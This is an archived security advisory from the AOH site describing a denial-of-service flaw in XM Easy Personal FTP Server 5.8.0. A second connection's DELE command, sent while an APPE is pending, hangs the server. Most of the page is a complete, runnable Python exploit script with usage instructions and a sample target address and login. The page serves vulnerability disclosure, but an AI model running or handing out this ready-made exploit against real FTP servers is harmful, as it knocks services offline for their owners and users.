AOH :: HP Unsorted X :: BT-21980.HTM

XM Easy Personal FTP Server 'APPE' and 'DELE' Command Remote Denial of Service Vulnerability



XM Easy Personal FTP Server 'APPE' and 'DELE' Command Remote Denial of Service Vulnerability
XM Easy Personal FTP Server 'APPE' and 'DELE' Command Remote Denial of Service Vulnerability



Date of Discovery: 13-Nov-2009

Credits:zhangmc[at]mail.ustc.edu.cn

Vendor: Dxmsoft

Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected

Overview:
XM Easy Personal FTP Server is an easy use FTP server Application. Denial of service vulnerability exists in XM Personal 
FTP Server when "APPE" is used in one socket connection while "DELE" command is used in another.

Details:
If you could log on the server successfully, take the following steps and the ftp server will stop responding:

first socket connection:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("PORT 127,0,0,1,122,107\r\n")
5.sock.send("APPE "+ test_string +"\r\n")
6.sock.close()

second socket connection:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("DELE "+ test_string +"\r\n")

Severity:
High

Exploit example:

#!/usr/bin/python
import socket
import sys

def Usage():
    print ("Usage:  ./expl.py        \n")
    print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
        Usage()
        sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    test_string="a"
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("user %s\r\n" %username)
    print "[-] "+ ("user %s\r\n" %username)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("pass %s\r\n" %passwd)
    print "[-] "+ ("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "[+] "+ r

    sock_data.bind(('127.0.0.1',31339))
    sock_data.listen(1)
    
    sock.send("PORT 127,0,0,1,122,107\r\n")
    print "[-] "+ ("PORT 127,0,0,1,122,107\r\n")
    r=sock.recv(1024)
    print "[+] "+ r
        
    sock.send("APPE "+ test_string +"\r\n")
    print "[-] "+ ("APPE "+ test_string +"\r\n")
    r=sock.recv(1024)
    print "[+] "+ r
    

     
    sock.close()
    
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("user %s\r\n" %username)
    print "[-] "+ ("user %s\r\n" %username)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("pass %s\r\n" %passwd)
    print "[-] "+ ("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "[+] "+ r

    sock.send("DELE "+ test_string +"\r\n")
    print "[-] "+ ("DELE "+ test_string +"\r\n")
    r=sock.recv(1024)
    print "[+] "+ r    
    
    sys.exit(0);





The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.